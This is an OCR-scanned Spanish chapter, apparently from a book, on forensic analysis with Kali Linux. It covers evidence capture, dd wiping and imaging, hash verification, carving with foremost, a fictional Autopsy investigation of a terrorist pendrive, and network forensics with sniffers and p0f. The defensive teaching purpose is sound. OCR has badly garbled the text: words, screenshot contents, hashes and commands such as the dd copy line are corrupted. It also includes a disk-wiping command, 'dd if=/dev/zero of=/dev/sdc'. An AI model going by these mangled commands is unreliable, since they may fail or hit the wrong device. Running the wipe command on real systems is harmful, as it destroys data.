El  estudio  del  mayor  mimero  de  evidencias  posible  eneoniradas  en  una  recogida  de  estas  dara 
information  concreta  y  verificable.  Es  de  gran  importancia  para  el  analista  forense  que  se  recojan 
todas  las  evidencias  posibles  y  que  todas  sean  tratadas  y  analizadas  de  manera  responsable  no 
perturbando  el  contenido  que  almacenan. 

^Que  evidencias  pueden  ser  invalidadas?  Aquellas  que  vulneren  la  intimidad  o  revelen  informacion 
personal  las  que  vulneren  las  normativas  de  seguridad  de  la  propia  empresa  u  organization  V 
aquellas  que  no  puedan  ser  demostradas  como  no  manipuladas.  Por  estas  razones  la  eaptura  y 
tratamierito  de  las  evidencias  es  imo  de  los  aspectos  mas  importantes  de  todo  analisis  forense. 


2.Captura  de  evidencias 

Uno  de  los  aspectos  fundamental  es  a  la  hora  de  ejecutar  un  analisis  forense  digital,  es  la  necesidad  de 
contar  con  evidencias  vaiidas.  Todas  aquellas  reeogidas  correctamente  son  potencialmente  validas. 
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pero  una  mala  pr&etica  o  un  pequefto  descuido  en  el  proceso  de  captura  pueden  llegar  a  invalidarlas, 
(  uando  se  presume  que  sobre  un  equipo  se  ha realizado  una  accion  maliciosa y  que  debe  ser  objeto  de 
andlisis,  la  prudencia  es  eseneiah  Siempre  debe  considerate  que  puede  ser  que  contenga  evidencias 
inleresantes  y  debldo  a  esto  es  necesario  tratarlo  como  un  sistema  con  informacion  importante  v 
sensible  para  el  caso,  De  no  hacerlo  permite  en  caso  de  juaclo  poder  argumentar  que  las  evidencias 
sustraidas  del  equipo  pueden  haber  sido  alteradas  durante  e!  estudio  con  el  objetivo  de  favorecer  o 
incriminar  a  alguien. 

Para  Ilevar  a  cabo  esfe  tipo  de  estudios,  no  existe  un  procedi miento  linico,  asi  como  tampoco  existen 
unas  herramientas  certificadas  que  sirvan  espeefficamente  a  efectos  judiciales.  A  dia  de  hoy  existe  un 
modelo  de  buenas  practicas  que  puede  servir  de  ayuda  u  orientacion  a  realizar  estudios  de  este  tipo, 
como  lo  es  el  RhC  3227  'Gina  para  la  recogida y  almacenamiento  de  evidencias  ",  Sin  embargo, 
El  uso  de  esta  guia  no  garantiza  el  cxito  total  en  el  proceso  de  captura  de  evidencia  y  la  validez  total 
de  ellas,  debido  a  la  falta  de  una  legislation  para  d  analisis  forense  digital  en  Espana  y  en  muchos 
paises  dc  la  Union  Europea,  For  eilo  no  puede  exprcsarse  de  man  era  especifica  que  proceso  es  el 
adeeuado  ni  cuales  son  las  herramientas  necesarias  y  como  deben  utilizarse, 

Principalmeme  hay  que  considerar  a  una  serie  de  elementos: 
a  -  ^Cual  es  el  cscenario? 

-  l,Qui  quierc  anahzarse? 

v  -  £l)e  cu^nto  tiempo  se  dispone  para  la  captura  de  evidencias? 

£D6nde  se  almacenanto  las  evidencias  recoleetadas? 
iCudntas  copias  se  deben  realizar? 

El  primer  proceso  en  un  anal i sis  forense,  (y  posiblemente  el  mas  critico  del  proceso  de  captura 
de  evidencias),  es  el  proceso  de  copiado  de  un  disco  o  ficheros  afeciados,  dicho  proceso  debe  de 
garantizar  las  siguientes  condiciones; 

-  Las  unldades  destinadas  a  almacenar  las  copias  deben  ser  borradas  de  manera  segura. 
Algunos  estandares  a  ni  vel  mundial  definen  que  para  realizar  un  borrado  seguro  del  dispositive 
el  proceso  debe  repetirse  entre  3  y  35  veces  dependiendo  del  estandar.  Estos  procesos  no  son 
mas  que  la  sobre  escrilura  total  de  valores  fijos  y/o  aleatorios  en  la  imidad  para  asegurar  que 
no  quede  rastro  de  lo  conlenido  anteriormente. 

-  Las  copias  realizadas  deben  ser  identicas  al  origen  y  por  consecuentc  entre  ellas  tambien. 

\  -  Bajo  ningun  motivo  debe  ser  alterado  el  origen  de  ios  datos  ni  el  destino,  Esto  podria 

eon  Ilevar  que  la  copia  no  pueda  ulilizarse  para  el  proceso  de  an&lisis,  e  incluso  puede  invalidar 
todas  las  evidencias  obtenidas  despues  del  mismo.  En  cualquier  caso,  debent  repetirse  la 
creacidn  de  una  copia. 

El  copiado  debe  scr  complete,  incluyendo  el  espacio  libre  ya  que  much  as  veces  es  posible 
que  se  consign  informacion  valiosa  en  el,  especialmente  si  se  ha  utilizado  algun  tipo  de 
herramientas  “antiforenses”. 
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-  Debc  aplicarse  una  funcion  hash  sobre  la  information  adquirida  para  corroborar  en  todo 
momento  la  integridad  de  las  copias. 


Este  ultimo  aspecto  cs  esencial.  garantizando  ast  que  las  conclusioncs  a  las  quc  sc  llega  tras  t.| 
anal isis  de  las  copias  realizadas,  parten  de  an  disco  o  ficheros  identieos  al  original  y  en  ningui, 
momento  lutn  sido  manipulados  despues  de  liabcr  sido  gencrados,  Permile  retorzar  la  validez  dc  I,|, 
pruebas  y  del  proceso  iorense.  Para  la  obtencion  del  hash  suele  utilizarse  AID 5,  sin  embargo  debido 
a  los  casos  de  colisiones  en  este  algoritmo  de  resumen  suele  acompanarse  de  otros  como  por  ejemplo 

el  SHA-I. 


Para  realizar  todo  este  proceso,  una  herramienta  muy  utilizada  y  que  esta  presenle  en  todos  los 
sistemas  GNV/Limtx  es  el  comando  ”dd."  Este  comando  permite  copiar  y  convenir  datos  a  bajo 
nivel.  Puede  utilizarse  tan  to  para  hacerse  el  borrado  seguro  de  la  unidad  donde  se  almaeenara  la 
copia  como  para  realizar  los  duplicados  del  origen  a  estudiar.  i| 

Lo  primero  que  se  debe  hacer  siempre  en  un  proceso  forense  es  un  borrado  seguro  dc  todos  los 
dispositivos  que  van  a  aimacenar  las  copias.  Para  esto  se  usa  el  siguiente  comando:  9 

"dd  if=/dev/zerv  of=  {dispositivo  pant  copia }  hs~IM" 

root^ali:  U  dd  if^/dev/zero  of-/dev/sdc  bs^lM 
dd^  escribiondo  */dsiiv/sdc»  ;  Mo  qua  da  espacio  en  al  dispositivo 
201+0  ragistros  leidos  I 

200+0  reglstros  oscritos 

209715200  bytOS  (210  MB)  copisdos,  1,9407  st  202  MB/s 
rootgkall;-'#  [  _ 

Imogen  07.0! :  Borrado  seguro  dc  un  dispositive*. 


Este  proceso  se  debe  repetir  como  se  comcnlo  anteriormente  varias  veces  segun  el  estandar  o  politics 
a  seguir.  Para  este  caso  de  estudio  se  repitio  el  proceso  3  veces.  ' 

Una  vez  que  los  dispositivos  que  almacenaran  las  copias  se  hayan  tratado  correspond ientenient 
5e  procede  a  realizar  las  copias  que  sc  utilizaran  para  el  estudio.  Es  importance  recalcar  que  nunca 
se  debe  trabajar  sobre  el  dispositive  original.  Para  hacer  las  copias  se  utiliza  el  siguiente  comando: 


“dd  if~  { dispositivo  original} of=  {dispositivo  para  copia }  bs-IM” 

root(*kali:  #  dd  iWdev/sdb  Qf-/dev/sdc  bs=lM 

200+9  negist  ros  leldos 
209+0  registros  estritos 

20971 52QQ  bytes  (210  MBj  coplfldos,  1 ,76957  s,  119  MB/s _ 

Imagcn  07,02;  Cop i ado  de  unidad  dc  estudio. 


Scguidamcnte  y  antes  de  comenzar  el  tratamiento  se  debe  comprobar  que  las  copias  son 
original,  hactendo  una  comprobaci6n  hash .  Para  ello  estifai  los  cotnandos  “md5siirn  y 
los  cuales  son  los  mas  comunmente  uiilizados. 


identicas  al 

“shalsutn  • 
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3.Tratainiento 


Para  el  tratamiemo  de  la  informacitin  recolectada,  Kali  Linux  time  inuehas  herramientas  utiles, 
Una  de  el  las  es  el  foremost,  con  ella  se  pueden  extraer  todos  los  ficheros  de  un  tipo  en  particular, 
analizandolos  no  por  su  extension  sino  por  sus  headers,  footers*  y  estmctura  interna.  Un  ejemplo 
claro  de  el lo  seria  si  se  tomara  la  copia realizada  o  la  imagen  y  se  quisieran  extraer  todas  las  imageries 
de  la  unidad  para  analtzarlas.  Para  ello  se  utilizarfa  el  comando: 

*  foremost  -t  { tipo  de  archive}  -i  j  imagen  o  copia  que  se  analizaj  -o  / rata  donde  se  almacenaranj 

root^kii ; -*/ntIPruebt>#  foremost  -t  jpg  -i  /dev/sdc  -o  Foranse 
Processing:  /dev/sdc 

J  | 

root@kali  : -/miPrii?  itf  cd  Forensa/jpg/ 
root@kali:~/miPrucba/Foren&e/jpfi#  is 
0OD02536 .  j  fig  00002792 .  j  pg  00G02848 .  jpg 
00002758 . J  pg  O0002824 . j  pg  00002888 . j  pg 
*  r  ao  tf k all ; ^/m i P  rueba/F  or tnse /j  pg# 

Imagen  07,03:  Extrayendo  las  imageries  eon  foremost. 


De  esta  manera  se  puede  extraer  cualquier  tipo  de  archivo  que  se  busque  (pdf,  txt,  jpg,  png,  etcetera), 
lambien  puede  usarse  Scalpel.  Estas  dos  herraraientas  son  muy  utiles  cuando  se  train  de  realizar 
un  Data  Carving.  Este  proceso  consiste  en  extraer  tma  serie  de  datos  de  un  gran  con  junto.  Es  una 
lecnica  que  se  utiliza  durante  toda  investigation  forense  cuando  se  analiza  el  espacio  libre  de  un 
sistema  de  ficheros  para  extraer  archives,  cs  decir,  estas  herraraientas  son  capaces  de  extraer  todos 
los  archivos  que  iueron  borrados  del  dispositivo  mientras  no  haya  sido  sobre  escrito  el  sector  donde 
se  almacenaba.  Si  se  repite  la  misma  prueba  pero  esta  vcz  se  ha  boirado  una  de  las  imagenes  es 
posible  ver  el  contenido  del  dispositivo: 

roolgkali:-*  foremost  -t  Jpg  -i  /Oev/sdel  -0  Desktop/prueba/  ¥1 

Processing:  /dev/sdc 1 

POUtikali:-#  | 

Imogen  07,04:  Nueva  ex  trace  ion  cam  foremast* 


<  t£:  Eserjtculo 


“ 


tk  irchlvov  de203  MS 


conFi  dene  r*L 


ymbifto 


hsEddd 


c>|§d«rciaLEi 


complice?.  JPG 


locaclonl  jpq 


proyectos 


tompUc  *3,fpq 


I  OC  30 on?  jprj 


pfueba 


contKtof 


locacion3.|pg 


Imagen  07,05:  Contenido  de  la  unidad  que  sc  analiza. 
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Puede  observarse  que  bay  solo  5  imageries,  pcro  al  ulilizar  foremost  y  extraerlas  lodas  del  disco 
se  obtienen  6  en  total.  Puede  observarae  quo  hay  una  foto  que  se  extrajo  del  dispositivo  que  no  so 
encontraba,  o  al  menos  no  se  vein  porque  se  habia  borrado  sin  embargo ,  foremost  pudo  recuperarla. 


Imagen  07.06:  Fat  as  extraidas  cm  foremost. 


Proof  Of  Concept:  Analisis  de  una  imagen 

Otra  herramienta  muy  polente  y  utilizada  en  el  mundo  forense  es  Autopsy.  Para  ver  su  poicncial  se 
explicara  su  funcionatniento  con  un  caso  que  pudiera  set  real;  S 

La  Brigada  Especial  de  Delitos  Informaticos  ha  side  requerida  por  la  Polida.  Esta,  1  leva  ha  2  rneses 
detras  de  terror! stas,  consiguiendo  averiguar  que  cn  unos  pacos  dias  puede  habet  una  entrega  de 
arm  as  entre  2  grupos  lerroristas  para  un  posible  atenlado-  Los  “experios”  de  la  policia  ban  heeho  sus 
propios  hallazgos  antes  de  entregarle  al  perito  el  pendrive : 

Sistema  de  Archives:  NTFS.  . 

-  lnformacidn  que  se  piensa  puede  cxistir  en  el  pendrive:  I'echa  y  lugar  de  la  reunion. 

Information  sobre  zulos.  9 

Para  este  caso  forense  se  solicita  al  perito  que  responda.  si  es  posible,  a  las  siguientes  cuestiones,  de 
interes  para  la  resolution  de  la  investigacion:  1 

-  Zulos  que  lienen  y  que  contiene  eada  uno 

-  Algun  mensaje  que  se  pueda  recuperar  cn  el  dispositivo  n 

Para  estudiar  este  dispositivo  el  perito  utilizara  Autopsy,  Al  ejecutar  la  herramienta  se  puede  observar 
que  en  la  terminal  se  arranca  un  servicio  al  cual  acceder  para  utilizar  la  herramienta.  j 

Terminal 


Autopsy  Forensic  Bnawsar 
http ; Z/wwW .  aleu Lhk  1 1  org/aul tipsy/ 
Vdf  ?.  ,24 


Evidence  Locks r;  Aer/Ub/ autopsy 
Start  Tittia:  Thu  Apr  16  11:53:19  2013 
ftamot*  Host:  local  host 
Local  Fort  t  9999 

Opah  an  HTML  browser  on  the  remote  host  and  paste  this  URL  in  it; 
http :/.AQcaT hast  ]9999/flutops¥ 

Kaeo  ttns  process  runniru  and  use  Lp  - - - 

Imagen  07.07:  Iniciando  el  semcio  de  Autopsy. 


Una  vez  que  Autopsy  esta  online,  solo  se  accede  al  servicio  a  iraves  del  navegador  de  Internet 
visitando  “localhost: 9999/Autopsy" . 


Imogen  07.08:  Home  de  la  herramienta  Autopsy, 

A  continuacion  se  crea  un  nuevo  caso  de  estudio  y  se  establece  el  nombre  del  easo,  la  descripcibn  y 
los  investigadores. 


Imagen  07. 09:  t’reando  un  nuevo  caso  en  Autopsy. 

Seguidamente  se  identifica  el  investigador  que  va  a  trabajar  en  el  caso  y  se  crea  tin  host  donde  se  va 
a  hacer  la  copia  de  la  imagen  del pendrive  que  se  va  a  estudiar, 

Croat Iny  Casej  utm>  mid 

a;I- £  dire  C  to rv  j  v,r ,  I J fl .. t-g c S V  • •  :  I, rii_Ka k :  J I  •  TT- 3  i. .1 
.i.'TifiQuratior;  AE«  i  fur,  i:i'.'5-.,tasi|f.-!  e.  uisr  iu>  ciedte-a 

We*  must  now  antuitn  a  host  for  this  , 

% 

pi«wi  a*  select  your  n4in<t  from  tho  1st  um&*no  ;  * 

Imagen  07.10;  Creamto  un  nuevo  host, 

Utid  vez  crea  do  el  host  e  identifieado  al  investigador.  se  debe  especifiear  el  archivo  de  la  imagen  quo 
86  va  a  estudiar,  Para  el  In  hay  que  especificar  la  ruta  de  la  imagen,  si  la  imagen  es  una  imagen  de 
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disco  o  de  una  particion  y  e!  raetodo  dejmportacion.  Preteribleraente  siempre  sc  dcbe  trabajar  sobre 
copias  para  garantizar  la  iniegridad  de  ias  evidences. 

— ^ -  AhOANI-W  |  MACKE  ” 


1 .  Location 

gfit&r  fusl  path  [starting  with  a  to  the  image  fiSe. 

Jf  tJie  image  le  split  (either  raw  Of  (JnCass),  than  mtmr  for  the 
extsnBion. 


yrODl/uED  dd 


:l  type 

PSeaea  seJeL  t  if  this  image-  Hie  :s  far  a  disk  or  a  single  partition. 

Disk  >  Partition 

3.  Import  Method 

To  analyze  the  image  file,  it  must  be  iocatsd  m  the  evidence  Jocrter.  it 
-can  bo  [mooned  from  its  current  location  using  a  symbolic  link  by 
c-opyinc  it.  or  by  moving  it  Mete  that  if  u  system  failure  occurs  during 
the  move,  then  the  image  could  Dseoms  corrupt. 

*  Copy  Move 


m 


Syntonic 


_ _ 


Imagen  07.1 1 :  Cnpia  de  la  mi  agon  para  analizar. 

L ue go  se  pasa  a  especificar  los  dcialles  de  la  imagen,  corno  el  formate,  el  panto  de  moiuaje  ^  Ili 
comprobacidn  de  la  integridad  dc  los  datos,  se  puede  hacer  una  comprobacion  manual  de  estos  con 
la  opci6n  “calculate",  o  si  ya  est4  realizado  el  hash  MD5  de  la  imagen  original,  especificarla  en  la 
opcion  “add"  y  la  herramienta  sc  encarga  dc  comprobar  que  los  hashes  coincidan. 


“  ™ ™  Imruj*v  Yt  I  a  D«l  ii£l'T_ 

Local  Naititu;  irnaSjBsfu'Sb.dd 

Data  integrity*  An  MD5  hash  can  be  u«9Ct  to  verify  L?;e  integrity  of 
the  image-  (With  fiplir  Images,  tote  hash  is  for  toa  full  image  ttsi 

'  Ipncrc  Ipe  hash  value  for  this  image 
»  Ca  inula  to  Che  hash  value  for  tfiie  imago. 

Aosl  to£  following  MDa  hash  value  rot*  tote  image: 


,□  Verify  hash  dfvsr  imporhngv 

File  System  Details 

Analysis  of  the  linage  file  shows  ‘-he  fclic-wir.g  pa  muons.- 


PartihnniaVpES:htfg 
Mount  Po:.nb  fc 


F:L»  System  lypeJ  ntf> 


-  , 

.Zj  •'  ;v- 


Imagen  07. 12:  Estableuendo  los  detalles  de  la  imagen. 

Eslo  calcularA  el  MD5  de  la  imagen  que  lue  copiada  por  Autopsy,  y  ya  solo  queda  eorapararla  con 
la  imagen  original.  ;t  | 

,:Ui-  uisLh-a  md  ■  thi .  ■  ■■  uid  take  «  whit*) 

. urru  ni  MD5:  o  tmm  ■  i  sneora  «/  ** t  w  n-c  mo 
Tasting  t  irtihonu 

q  spying  1  n  I V ,  [ 9 ■  1  ri X  '  ftvid a n  ■?  f t k « n r  i  (flu c  c u uJd  t a k i  a  Jh.c.i e  w n tfo : 
magi-  hie  added  v.ith  -D  m^L 


Volume  image  (0  to  0  ntfs  •  CP,  andr-d  with  ID  «u 


OK 


Jtoplmuu 


imagen  07. 13:  WD5  obtenido  dc  la  copia  que  genera  Autopsy. 


a 


root@kali mdBsum  / root/usb-dd 
876b86716t>d0d22fB2flBca7bf  f  ft2da2  /root/usb ,dd 


Imagen  07,14:  W)5  obtemdn  tie  hi  image n  del  USB  original. 


l  'na  vez  comprobadas  que  ambas  imagines  son  iguales,  se  precede  ai  anal  bis  de  la  information 
contenida  en  el  pendrive,  Se  observa  que  todo  el  contenido  del  mismo  se  ha  rccuperado,  \  se 
observan  carpetas  que  comienzan  con  cl  si'mbolo  S,  (en  el  sislcma  de  archivos  NTFS).  las  cuales  no 
son  visibles  a  I  usuario  habitual. 

Pueden  verse  tambien  2  imagenes  y  un  do  cu  men  to.  Las  totos  despues  de  revisarse  no  tienen  nada 
importante.  sin  embargo  el  documento  resulta  algo  extrano  por  su  peculiar  nombre.  A  continuacidn 
se  precede  a  la  extraccion  del  documento  para  analizarlo  y  al  intentar  abrirlo  para  ver  su  contenido 

estc  solicita  una  contrasefia.  Este  comportamiento  cs  algo  sospechoso  asi  que  la  investigacidn  pasa 
a  eentrarse  en  el. 

Tras  cicntos  de  pruebas  y  transcurridas  varias  boras  con  el  mismo  documento,  sc  descubre  a  Paves 
de  un  servicio  de  decodificacion  de  base64,  la  decodificacion  de  "en  Vsb3MK",  cuvo  nombre  es 


Imagen  07.15:  Decodificacion  dc  hi  palabra, 


Ahora  el  perito  tiene  en  sli  poder  un  archivo  . doc  de  nombre  "zulos”,  lo  que  probablemente  puede 

signiflear  que  alii  este  contenida  toda  la  inforniacion  de  los  zulos  de  la  red  terrorista,  y  el  contenido 
de  el  los. 


fleniro  de  las  carpetas  de  sislcma  en  el  Autopsy  se  pudo  ver  una  llamada  “SOrphanFiles*  Dicha 
carpeta  general menle  contiene  archivos  eliminados  de  la  unidad,  a  estos  archives  se  les  denomina 
archivos  huerfanos”.  Una  vez  dentro  de  SOphan Files  puede  observarse  que  la  mayoria  de 
•os  ai  chi  vos  esian  vacios,  sin  embargo  los  dos  ultimos  parecen  algo  sospechosos,  el  tamaflo  del 
Archive  es  dislinio  a  0  por  lo  tanto  el  perito  inhere  que  puede  contener  information  util  y  precede  a 
analizarlos.  El  contenido  de  ambos  archivos  es  algo  extrano. 
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Imagen  07. 1 6:  Contenido  dd  primer  archive  huerfana 


Imagen  07,17:  Contenido  del  segundo  archive  hudr&no. 

El  contenido  del  primer  archivo  huerfano  parece  ser  una  representacion  hexadecimal,  por  lo  cua| 
el  perito  utiliza  el  comando  "xxd”  para  convertir  cl  contenido  del  archivo  y  se  obtlene  el  siguieme 

resultado. 


Iiriagen  07.1 8:  Conversion  de  h  representation  hexadecimal, 

EI  resultado  obtenido  es  “123abc.”  Pero  eso  al  perito  no  le  dice  nada  por  si  solo,  por  lo  tanto  se 
centra  en  el  segundo  archivo.  El  contenido  del  segundo  archivo  si  contiene  una  pista.  Cada  linca  oe 
archivo  termina  con  lo  cual  le  indica  al  perito  que  es  una  representacion  base64  de  un  texto. 
asi  que  utiliza  la  misma  herramienta  eon  la  que  convirtio  el  nombre  del  document  y  obiiene  3  lmeas 
muy  interesantes.  Analizando  cada  una  de  las  lineas  por  separado  se  obtiene  el  siguiente  resultado: 


Imagen  07.19:  Decod  ificaadn  de  la  primera  linea. 


Capituio  VI 7.  Forense  con  Kali 


i 


iimn*  v 

.  -  -  . 


(row  m*  a... 


atjytti,  P»#*se  do  not  putt  mo 


i  qut  nos  «igufmr  ftn  tiudadd 


I 


■MH 

It  for  copyi 


— 


£or  copy  pttft)  tom§  t**t  to  tttiow  Th#  U*t  c« 

-  - 10  ‘r'e-<>'s'  *  *  s«»*4 

[ct  V j  dWVy  ZGEgc  )CVllG5vcrBzaildlZW4sIh-Rlbia]  dWH  YHFfr 

Imagcn  07.20:  Decod  ificad  on  de  la  segunda  linea. 


*«  IPOtKNfflOfrytis 
string 


con ties  an  osvaldo 

B 


"  ’  I  j i  j 

>  (Of  copy  p^sts  sornt  text  to  a  textu 
o  to  «ncod#  to  a  Bati64 


b«8gY29u  Zm  11  c  y  Bl  bi0v  c  3Zh  bGftv  Cg  * 


Imagen  07.2 1 :  D^sOodificacidn  dc  la  Lercera  linea. 


Va  con  esto  el  peri  to  logro  idciitificar  c  nan  do  se  realizara  la  entrega,  !os  unices  cabos  sueltos  que 
quedan  son:  el  documento,  y  el  “  1 23abc/\  Luego  de  varias  vueltas  e  intentos  el  perito  relaciona 
ambas.  ;pY  si  el  contenido  del  primer  archivo  Huerfano  es  la  clave  de!  documento? 


fmagen  07,22:  Pctictor  de  password  para  ahrird  document. 


Imagcn  07.23:  Contenido  dd  documento  *7uUn>*\ 


Una  vez  abierto  el  documento  el  perito  consiguio  la  informacidn  faltante  dd  caso,  quedando  en 
evidencia  la  eficiencia  de  esta  herramienta  para  analisis  forenses. 

Kali  Linux  tiene  muchas  otras  herramientas  para  estudios  forenses/todas  eon  un  iriismo  objetivo, 
garantizar  el  analisis  mas  exhaustive  posible  y  recuperar  hasta  el  ultimo  fragmento  de  informacion 
contenido  en  el  dispositive,  y  el  respective  estudio  de  la  infonnacion  obtenida. 
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Rifuiti  pot  ejemplo,  es  una  herramienta  de  anAlisis  forense  para  la  papelera  de  reciclaje.  Una  gran 
cantidad  dc  investigaciones  de  delitos  inform&ticos  requieren  la  recon strucc ion  de  la  papelera  de 
reciclaje. 

If  n  equivalents  a  esta  herramienta  pero  para  entomos  CNU/Linux  cs  Ext  undelete,  Esta  aplicacidn 
puede  recuperar  archives  borrados  de  una  particion  ext3  o  ext  4,  Extundelete  utiliza  la  inform  act  on 
almacenada  en  la  tabla  de  particion  para  intentar  recuperar  los  archives  que  ban  sido  borrados, 

Pasco  es  otra  herramienta  may  util  de  recuperacion,  Bn  cste  caso  esta  aplicactdn  reporta  la  salida 
en  un  tic  hero  con  texto  delimitado.  lists  herramienta  permite  visual  izaT  un  archive  cualquiera 
detalladamente  y  de  manera  organizada.  Muy  utilizada  para  el  analisis  de  cache ,  cookies  y  ei  historial 
de  navcgacion.  Otra  opciun  interesante  de  esta  herramienta  es  el  modo  “undelete',  que  hace  caso 
omiso  a  la  informacion  que  hay  en  la  tabla  Hash  y  reconstruye  cualquier  dato  valido  de  actividad, 
Gracias  a  esto  recupera  informacion  que  otras  herramientas  no  logran  rescalar.  u 


4.  Forense  de  red 

El  forense  dc  red  es  la  ram  a  que  se  encarga  dc  analizar,  investigar  y  evaluar  las  acciones  que  ban 
sucedido  en  un  segments  de  red  en  un  instanie  concrete,  FI  forense  de  red  intentari  responder  a  las 
siguientes  sentencias: 

“Creemos  que  nos  turn  robado 
" Creemos  que  nos  esfdn  atocando  " 

“Creemos  que  alguien  no  es  quien  dice  ser 
"Creemos  que  el  senvdor  esta  apagado  " 

,  Que  se  debe  analizar  realmente  en  un  forense  de  red?  Hsta  pregunta  tiene  facil  respuesta,  todo  to 
que  circula  por  la  misma*  Dependera  del  entorno  y  de  los  protocolos,  es  decir,  <:P5e  saben  conic  ban 
sucedido  los  acontecimientos?  t'fSe  conoce  el  protocolo?  ^  Lx  isle  informacion  publica?  £Se  puede 
descifrar  la  informacion?  ,  m 

Existen  gran  cantidad  de  proiocoios,  y  el  analista  forense  no  tiene  por  que  conocer  todos,  pero  si 
esie  eneuentra  atguno  que  no  conoce  debera  estudiarlo  y  aprender  su  funcionamiento  para  proseguit 
con  ei  an&lisis. 


Captura  de  evidencias  en  red 

La  captura  dc  evidencias  en  red  se  llevarfi  a  cabo  con  un  sniffer*  por  ejemplo  HI  reshark.  Hay  que 
tenet  en  cuenta  que  se  pueden  generar  archives  de  cientos  de  MB,  o  incluso  de  GB«  La  coni lguruc ion 
que  se  puede  establecer  en  un  switch  con  el  fin  de  que  este  envie  una  copia  de  todos  los  paquetes  que 
pasan  por  uno  o  mas  puertos  se  denomina  mirroring-port.  El  puerto  concrete  que  reetbe  el  trafico 
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de  red  se  denomina  monitor-port ,  este  puerto  podria  ser  otto  switch  o  el  destino  final  es  dedr\  un 
equipo  con  un  sniffer. 

Esta  configuracidn  descrita  es  realmente  util  cuando  se  necesita  monitorizar  el  trafico  de  red  para 
detectar  intrusiones  en  la  red  corpomtiva  o  en  un  segment©  dado.  Una  vez  realizada  la  captura  de 
evidencias  se  deberan  aplicar  distintos  filtros  que  pueden  ayudar  a  optimizar  las  biisquedas,  dichas 
filtros  se  realizaran  sobre  una  eopia  de  la  captura: 

-  Realizar  operaciones  de  limpieza  para  dejar  la  eopia  de  la  captura  con  la  information  mas 
importante  posible. 

Anal  tzar  que  no  existen  paquetes  defectuosos  en  la  copia  de  la  captura* 

-  Analizar  de  la  caps  inferior  hacia  la  superior  del  protoeolo  TCP/IP,  si  este  es  el  entomo 
en  el  que  se  encuentra  el  analista. 

Si  se  conocen  direcciones  IP  criticas  sobre  las  que  se  quiere  realizar  el  forense,  apficar 
filtros  que  simpiifican  aun  mas  la  captura  anterior.  De  este  modo  se  busea  focal izar  el  analisis 
en  ciertas  direcciones  IP  y  e!  comportamiento  en  la  red  de  las  maquinas  de  dichas  direcciones. 

Las  herramientas  utilizadas  para  la  captura  de  evidencias  en  red  son,  como  se  ha  mencionado 
anteriormente,  simplemente  sniffers,  A  continuation  se  muestra  un  Iisiado  de  algunos  disponibles 
en  Kali  Linux: 

Wires  hark. 

Tshark. 

Tcpdump. 

La  herramienta  Tshark  es  basicamenie  la  linea  de  com  and  os  de  Wires  hark  reuniendo  gran  cant  i  dad 
de  flmcionalidades  que  aporia  Wireshark  en  el  entomo  grafico,  Ademas,  perraite  la  realization  de 
scripting,  por  lo  que  es  realmente  util  para  la  automatization  de  tareas* 

For  otro  lado  la  herramienta  Tcpdump  es  un  clasico  de  los  sniffers.  Sc  cncarga  de  voicar  a  un  fichero 
o  mostrar  por  pantalla  todo  el  trafico  que  esta  circulando  por  la  tarjeta  de  red  donde  se  configura. 


Fingerprint 

HI  Fingerprint  es  una  teenica  realmente  util  en  un  analisis  fore n sc  de  red,  ya  que  permite  obtener 
informacion  important^  del  trafico  de  red  que  esta  llegando  o  I  lego  a!  equipo*  El  Fingerprint  puede 
ser  active  o  pasivo*  Los  metodos  activos  realizarin  alguna  operation  sobre  una  maquma  concreta 
para  obtener  mlbrmacion  de  ella,  Por  otro  lado  los  metodos  pasivos  utili/aran  una  captura  de  red  o  el 
trafico  que  liega  hasta  la  tarjeta  para,  a  partir  de  dicha  informacion,  inferir  la  misma.  l  a  informacion 
que  se  suele  obtener  de  dicho  proceso  slide  ser  el  sistema  operative  y  en  ocasbnes  su  version, 
los  puertos  abiertos,  las  versiones  de  productos  que  esten  inslalados,  las  versiones  de  protocol  os, 
etcetera* 
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Kali  Linux  dispone  de  la  herrannenta  pOf  que  es  capaz  de  realizar  un  Fingerprint  pasivo.  Por  otro 
lado  para  realizar  un  Fingerprint  activo  se  pucden  ulilizar  herramientas  como  Nmap.  La  herramiema 
pOf  pennite  realizar  las  siguientes  acciones:  1 

-  Detectar  la  exislencia  de  un  posible  balanceador  de  earga. 

Detectar  la  presencia  de  sistemas  cortafuegos. 

Identificar  que  tipo  de  conexidn  dispone  el  equipo  remote,  por  ejemplo,  DSL.  modem, 
etcetera,  Asi  como  el  proveedor  de  Internet. 

f 

Distancia  al  sistema  remote  y  el  tiempo  de  ejecucion, 

root@kali: -#  p0f  -i  ethG 

pQf  -  passive  os  fingerprinting  utility,  version  2.0,8 

(C)  M *  Zalewski  <lcamtuf@dione.cc>,  W,  Steams  <wsteams@pobox  ,com> 

p0f:  listening  (SYM)  on  'ethG',  262  sigs  [14  generic,  cksum  GF1F5CA2) ,  rule:  'al 

lh  . 

192 . 160 .0 ,62 : 1073  -  Windows  XP  SP1  +  ,  2000  SP3 

->  192.168,0,64:4444  (distance  0,  link:  et he  met /modem) 

192 .168.0-62: 1073  -  Windows  XP  SPU,  2000  SP3 

->  192.168.0.64:4444  [distance  0,  link:  ethernet/modem) 

192,168.6,62 : 1073  -  Windows  XP  SPHf  26BG  SP3 _ _ _ _ 

Imagen  07.24:  Ejemplo  de  uso  de  pOf. 

Lsage:  pB f  [  -f  file  ]  [  -i  device  ]  [  b  file  ]  l  -o  file  ] 

(  -w  file  3  [  -Q  sock  [  -a  ]  }  [  -u  user  ]  [  -FXVNDUKASCHRQqtpvdt rx  I1 

{  jc  size  3  [  -T  r»n  )  [  nn  ]  (  'filter  rule'  I  : 

-f  file  -  reed  fingerprints  from  file 

-i  device  -  listen  on  this  device 
-s  file  read  packets  from  tepdump  snapshot 
-o  file  -  write  to  this  logfile  (implies  -t) 

-w  file  -  save  packets  to  tepdump  snapshot 

-u  user  -  chroot  and  setuio  to  this  user 

-g  sock  listen  on  local  socket  for  queries 
-0  -  make  sre  port  0  a  wildcard  [in  ouery  mode) 

-e  ms  -  pcap  capture  timeout  in  milliseconds  (default:  1) 

-c  size  -  cache  size  for  -Q  and  -M  options 

-M  -  run  masquerade  detection 

-T  nn  -  set  masquerade  detection  threshold  [1-2QQ) 

-V  *  verbose  masquerade  flags  reporting 

-F  -  use  fuzzy  matching  (do  not  combine  with  -R) 

-N  *  do  not  report  distances  and  link  media 

-D  -  do  not  report  05  details  [just  genre) 

-U  -  do  not  display  unknown  signatures 

-K  -  do  not  display  known  signatures  [for  tests) 

-S  -  report  signatures  oven  for  known  systems 

-A  -  go  into  SYN+ACK  mode  ( semi ‘supported) 

-ft  -  go  into  R5T/RST+ACK  mode  { semi -supported) 

